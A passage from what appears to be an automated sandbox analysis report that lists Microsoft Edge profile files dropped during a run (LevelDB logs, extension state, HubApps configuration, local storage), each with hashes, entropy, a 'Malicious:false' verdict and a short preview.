                                                                                                                                                                                                                                                                                      Entropy (8bit):5.119223634930302
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:HIQJJVq2PN723oH+Tcwt8aPrqIFUt8YIQJ2ggZmw+YIQJGIkwON723oH+Tcwt8a4:oQJJVvVaYebL3FUt8rQJng/+rQJGI5Of
                                                                                                                                                                                                                                                                                      MD5:75CC69856AE94400CB9D5B849D7A298F
                                                                                                                                                                                                                                                                                      SHA1:4DD856A5D177CAAE9E337FA464F8ECB82C20AF35
                                                                                                                                                                                                                                                                                      SHA-256:AF246BA30B84C872294C7E9109948813A778E703DF3AA3977A4ADAC1A3EFA46F
                                                                                                                                                                                                                                                                                      SHA-512:419C5CFD13D54C8EE834A8A4EBB494A560C06C3C860B0213DA3A680B43263A5992798B66C9BF4C1BAA3BE4852FBFDCCCD2D164C969A917B67120542284902EA6
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:2024/11/20-04:54:31.629 1fa0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/20-04:54:31.630 1fa0 Recovering log #3.2024/11/20-04:54:31.631 1fa0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):328
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.119223634930302
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:HIQJJVq2PN723oH+Tcwt8aPrqIFUt8YIQJ2ggZmw+YIQJGIkwON723oH+Tcwt8a4:oQJJVvVaYebL3FUt8rQJng/+rQJGI5Of
                                                                                                                                                                                                                                                                                      MD5:75CC69856AE94400CB9D5B849D7A298F
                                                                                                                                                                                                                                                                                      SHA1:4DD856A5D177CAAE9E337FA464F8ECB82C20AF35
                                                                                                                                                                                                                                                                                      SHA-256:AF246BA30B84C872294C7E9109948813A778E703DF3AA3977A4ADAC1A3EFA46F
                                                                                                                                                                                                                                                                                      SHA-512:419C5CFD13D54C8EE834A8A4EBB494A560C06C3C860B0213DA3A680B43263A5992798B66C9BF4C1BAA3BE4852FBFDCCCD2D164C969A917B67120542284902EA6
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:2024/11/20-04:54:31.629 1fa0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/20-04:54:31.630 1fa0 Recovering log #3.2024/11/20-04:54:31.631 1fa0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):418
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                      MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                      SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                      SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                      SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):332
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.114980323295436
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:HIQr4Vq2PN723oH+Tcwt865IFUt8YIQoYgZmw+YIQoYIkwON723oH+Tcwt86+ULJ:oQr4VvVaYeb/WFUt8rQoYg/+rQoYI5O0
                                                                                                                                                                                                                                                                                      MD5:F697815CA54D0D6F5438E9A4145954EE
                                                                                                                                                                                                                                                                                      SHA1:5D6E1C8ED7BD5AA402E067BA2805ABECFDB8EFEA
                                                                                                                                                                                                                                                                                      SHA-256:AC26B8E50E691FC9E677FF333D71CB4278EB8C0DFDF4BB2D7B4CFF69BD5034DC
                                                                                                                                                                                                                                                                                      SHA-512:1C874156ECBD803FDDA9DEEF68158EA49756512F2A4E60D3CB9E3DD3A4E36D64035EBCDF1454E62BFE61F974467B6E59987F3A4720B0A9D260429D1067F23655
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:2024/11/20-04:54:31.730 1fa0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/20-04:54:31.742 1fa0 Recovering log #3.2024/11/20-04:54:31.742 1fa0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):332
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.114980323295436
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:HIQr4Vq2PN723oH+Tcwt865IFUt8YIQoYgZmw+YIQoYIkwON723oH+Tcwt86+ULJ:oQr4VvVaYeb/WFUt8rQoYg/+rQoYI5O0
                                                                                                                                                                                                                                                                                      MD5:F697815CA54D0D6F5438E9A4145954EE
                                                                                                                                                                                                                                                                                      SHA1:5D6E1C8ED7BD5AA402E067BA2805ABECFDB8EFEA
                                                                                                                                                                                                                                                                                      SHA-256:AC26B8E50E691FC9E677FF333D71CB4278EB8C0DFDF4BB2D7B4CFF69BD5034DC
                                                                                                                                                                                                                                                                                      SHA-512:1C874156ECBD803FDDA9DEEF68158EA49756512F2A4E60D3CB9E3DD3A4E36D64035EBCDF1454E62BFE61F974467B6E59987F3A4720B0A9D260429D1067F23655
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:2024/11/20-04:54:31.730 1fa0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/20-04:54:31.742 1fa0 Recovering log #3.2024/11/20-04:54:31.742 1fa0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1254
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                      MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                      SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                      SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                      SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):328
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.150011774115024
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:HIQwT3zyq2PN723oH+Tcwt8NIFUt8YIQwTA11Zmw+YIQwTAjRkwON723oH+Tcwt2:oQwjzyvVaYebpFUt8rQw8X/+rQw8jR5C
                                                                                                                                                                                                                                                                                      MD5:CEF5FFE9A0473AAF94D047C1681AF290
                                                                                                                                                                                                                                                                                      SHA1:17414C088270313424DB55ADABE75749C8FAF5B8
                                                                                                                                                                                                                                                                                      SHA-256:380178AD1127690D03A04254DB5BF275E8D31986A24E4DD84464B81F5A50EBCB
                                                                                                                                                                                                                                                                                      SHA-512:B37D9EF067A0E7CD40355B461E77F7BF2CA6A65500AFEE7B68EACE087A52920F346FF3BA15020CF31AAA3C6E1DE975EE5A387B0D0D5740688593B5C2BA87DDF0
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:2024/11/20-04:54:32.608 1f54 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/20-04:54:32.609 1f54 Recovering log #3.2024/11/20-04:54:32.609 1f54 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):328
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.150011774115024
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:HIQwT3zyq2PN723oH+Tcwt8NIFUt8YIQwTA11Zmw+YIQwTAjRkwON723oH+Tcwt2:oQwjzyvVaYebpFUt8rQw8X/+rQw8jR5C
                                                                                                                                                                                                                                                                                      MD5:CEF5FFE9A0473AAF94D047C1681AF290
                                                                                                                                                                                                                                                                                      SHA1:17414C088270313424DB55ADABE75749C8FAF5B8
                                                                                                                                                                                                                                                                                      SHA-256:380178AD1127690D03A04254DB5BF275E8D31986A24E4DD84464B81F5A50EBCB
                                                                                                                                                                                                                                                                                      SHA-512:B37D9EF067A0E7CD40355B461E77F7BF2CA6A65500AFEE7B68EACE087A52920F346FF3BA15020CF31AAA3C6E1DE975EE5A387B0D0D5740688593B5C2BA87DDF0
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:2024/11/20-04:54:32.608 1f54 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/20-04:54:32.609 1f54 Recovering log #3.2024/11/20-04:54:32.609 1f54 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):429
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                      MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                      SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                      SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                      SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):115717
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                      MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                      SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                      SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                      SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 13, cookie 0x3, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):53248
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.4138006761958097
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:384:Fj9P0sP/Kbtfjl+QkQerV773pLwgam6I0hlcERKToaAu:FdzP/yl+e2V7xEAERKcC
                                                                                                                                                                                                                                                                                      MD5:2E8D4A770FDD06AB1DE35BD79F53188E
                                                                                                                                                                                                                                                                                      SHA1:1C6439E65B4119C63B441D46B01E949DD5D36690
                                                                                                                                                                                                                                                                                      SHA-256:EBCFBA5358171D803867CCD1030DFBD9B10E973F7F188A2A0EBF0C805F5688C0
                                                                                                                                                                                                                                                                                      SHA-512:31E16A705684BFAEA09915D7D622F9B9BB3CAF81B9BDCF6472BD16558E468AF8386212907360F147C85953F9E74A0AB7991CB7C21F76957DC8BD67A3B99D4C3E
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):412
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.279440552736972
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:oQbQyvVaYeb8rcHEZrELFUt8rQbL/+rQbXR5OaYeb8rcHEZrEZSJ:2YVaYeb8nZrExg8eDOaYeb8nZrEZe
                                                                                                                                                                                                                                                                                      MD5:9DD0BE3E93569D2BDB5E14E9B6D00E86
                                                                                                                                                                                                                                                                                      SHA1:8712C77E986AEAA21D2409EC94F91FA3C035A290
                                                                                                                                                                                                                                                                                      SHA-256:2F2C6EA29AFE471ED943B6AE74C502996E9810B17E5864812F064246291B6A9C
                                                                                                                                                                                                                                                                                      SHA-512:204B6FF52958D03993969F17400E86E68834732EBBF8DDFA1DB92FB29E3D924F2F34C14B05CE6955B6B513AD9EAAB824CF35EDEAADBD3C0C0E52EEB8FBE8F66B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:2024/11/20-04:54:37.238 1f54 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/20-04:54:37.239 1f54 Recovering log #3.2024/11/20-04:54:37.239 1f54 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):412
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.279440552736972
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:oQbQyvVaYeb8rcHEZrELFUt8rQbL/+rQbXR5OaYeb8rcHEZrEZSJ:2YVaYeb8nZrExg8eDOaYeb8nZrEZe
                                                                                                                                                                                                                                                                                      MD5:9DD0BE3E93569D2BDB5E14E9B6D00E86
                                                                                                                                                                                                                                                                                      SHA1:8712C77E986AEAA21D2409EC94F91FA3C035A290
                                                                                                                                                                                                                                                                                      SHA-256:2F2C6EA29AFE471ED943B6AE74C502996E9810B17E5864812F064246291B6A9C
                                                                                                                                                                                                                                                                                      SHA-512:204B6FF52958D03993969F17400E86E68834732EBBF8DDFA1DB92FB29E3D924F2F34C14B05CE6955B6B513AD9EAAB824CF35EDEAADBD3C0C0E52EEB8FBE8F66B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:2024/11/20-04:54:37.238 1f54 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/20-04:54:37.239 1f54 Recovering log #3.2024/11/20-04:54:37.239 1f54 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1153
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.6050098690217105
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:iZW9mEWslHul/fe+n7YgXZoWRV03y1x4mdMyG:iZ3EWHHeCDXZ3RV03Sx4mWyG
                                                                                                                                                                                                                                                                                      MD5:93D8D911E1802E43B5D45421900D9382
                                                                                                                                                                                                                                                                                      SHA1:5129740C044DA00350ABB60DA014C4402F849106
                                                                                                                                                                                                                                                                                      SHA-256:8098A8A344862A259E4EF9C0C3B4D8E7B866DDDE486494278C3B67F522389604
                                                                                                                                                                                                                                                                                      SHA-512:DDFEB35092356A844A5C1FFBD2B726E9166F8F482ADF6D1086BD11C486C7230C2E431D796F7D45423C2437A3C1BC0829F61B2742F15DD87CF0726234A834B41F
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:A.u.z................VERSION.1..META:https://ntp.msn.com............._https://ntp.msn.com..FallbackNavigationResult@.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":1210}.!_https://ntp.msn.com..LastKnownPV..1732096479217.-_https://ntp.msn.com..LastVisuallyReadyMarker..1732096480644.._https://ntp.msn.com..MUID!.3EF9631D947761DE3FBC762095E360F1.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1732096479302,"schedule":[4,-1,30,14,-1,-1,-1],"scheduleFixed":[4,-1,30,14,-1,-1,-1],"simpleSchedule":[34,11,31,15,32,9,37]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1732096479163.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241119.367"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):340
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.134083808174364
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:HIQwVc+Iq2PN723oH+Tcwt8a2jMGIFUt8YIQwVcvZmw+YIQwRPkwON723oH+Tcw2:oQwVovVaYeb8EFUt8rQwVo/+rQwV5Oao
                                                                                                                                                                                                                                                                                      MD5:CDE38267128B39398E274B0E79707AB3
                                                                                                                                                                                                                                                                                      SHA1:3E7FDFE3DAFB13D1846E47BCA3CFC27CCCA11BAC
                                                                                                                                                                                                                                                                                      SHA-256:E4D03074B1074E636AF85F1F37E673D1801E2ACC3E610DEC73FE6DDE2E51C67E
                                                                                                                                                                                                                                                                                      SHA-512:9B6C0275430CC4C02767E2B83F947D9DD930712065EEB684A6F2CF975724B4FD463070C03D348ED313F381D132ED1B895FE17CCB2EB4A073BD24044293CD0C7B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:2024/11/20-04:54:32.097 13d4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/20-04:54:32.098 13d4 Recovering log #3.2024/11/20-04:54:32.101 13d4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):340
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.134083808174364
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:HIQwVc+Iq2PN723oH+Tcwt8a2jMGIFUt8YIQwVcvZmw+YIQwRPkwON723oH+Tcw2:oQwVovVaYeb8EFUt8rQwVo/+rQwV5Oao
                                                                                                                                                                                                                                                                                      MD5:CDE38267128B39398E274B0E79707AB3
                                                                                                                                                                                                                                                                                      SHA1:3E7FDFE3DAFB13D1846E47BCA3CFC27CCCA11BAC
                                                                                                                                                                                                                                                                                      SHA-256:E4D03074B1074E636AF85F1F37E673D1801E2ACC3E610DEC73FE6DDE2E51C67E
